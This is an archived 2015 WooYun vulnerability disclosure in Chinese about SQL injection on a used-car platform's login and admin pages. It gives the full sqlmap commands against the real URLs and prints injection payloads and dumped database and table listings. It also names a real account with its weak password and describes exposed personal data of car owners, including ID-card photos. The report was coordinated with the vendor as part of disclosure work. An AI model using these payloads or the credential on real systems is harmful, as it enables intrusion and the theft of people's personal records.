乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-11-03: 细节已通知厂商并且等待厂商处理中 2015-11-04: 厂商已经确认,细节仅向厂商公开 2015-11-14: 细节向核心白帽子及相关领域专家公开 2015-11-24: 细节向普通白帽子公开 2015-12-04: 细节向实习白帽子公开 2015-12-19: 细节向公众公开
大量车主信息(姓名/手机/车牌号/合同/身份证正反面照片)
地址 http://wbgh.youxinpai.com/login/与前面提交的http://wooyun.org/bugs/wooyun-2010-0149556 目测使用的同一套程序
sqlmap -u "http://wbgh.youxinpai.com/login/check/" --data "username=&password=m"
---Parameter: username (POST) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) Payload: username=-1231' OR 8092=8092#&password=m Type: error-based Title: MySQL OR error-based - WHERE or HAVING clause Payload: username=-6771' OR 1 GROUP BY CONCAT(0x7178767a71,(SELECT (CASE WHEN (3647=3647) THEN 1 ELSE 0 END)),0x71717a6b71,FLOOR(RAND(0)*2)) HAVING MIN(0)#&password=m Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT - comment) Payload: username=' AND (SELECT * FROM (SELECT(SLEEP(5)))hVQi)#&password=m---[15:55:31] [INFO] the back-end DBMS is MySQLweb application technology: PHP 5.4.14back-end DBMS: MySQL 5.0.12
获取数据库
current user: '[email protected].%'available databases [4]:[*] AuditDB[*] information_schema[*] test[*] wbghDatabase: wbgh+--------------------------------+---------+| Table | Entries |+--------------------------------+---------+| credit_youfen_consume_category | 95080 || credit_youfen_consume | 65559 || credit_youfen_credittrade | 32144 || credit_youfen_consume_city | 29079 || credit | 18627 || credit_result | 17279 || credit_youfen | 7238 || credit_zhongzhicheng | 5550 || transfer_op | 5449 || transfer_img | 3868 || credit_digcredit | 3578 || transfer_log | 1667 || transfer | 1167 || transfer_extend | 816 || bg_back | 647 || area_city | 509 || jr_information | 457 || picc_back | 244 || rbac_masterrole | 146 || rbac_master | 97 || rbac_actionrole | 87 || rbac_action | 52 || rbac_log | 33 || area_province | 31 || area_opencity | 7 || area_bigarea | 4 || rbac_role | 4 || zh_confim | 1 |+--------------------------------+---------+
密码都是弱口令,解密后为6个0
随便登录一个 用户名 jinanwb 密码 000000登录后也存在SQL注入
sqlmap -u "http://wbgh.youxinpai.com/management/car_admit/?opt=search&showstatus=&old_car_no=&car_type=&buyse_order_id=&buyer_phone=&time_type=share&ftime=&etime=&select=%E6%9F%A5%E8%AF%A2" --cookie="你的cookie"参数 car_type可注入
大量合同
大量订单
订单详情
高清身份证照片
如上
多给点Rank
危害等级:高
漏洞Rank:15
确认时间:2015-11-04 17:50
非常感谢您的关注和反馈!
暂无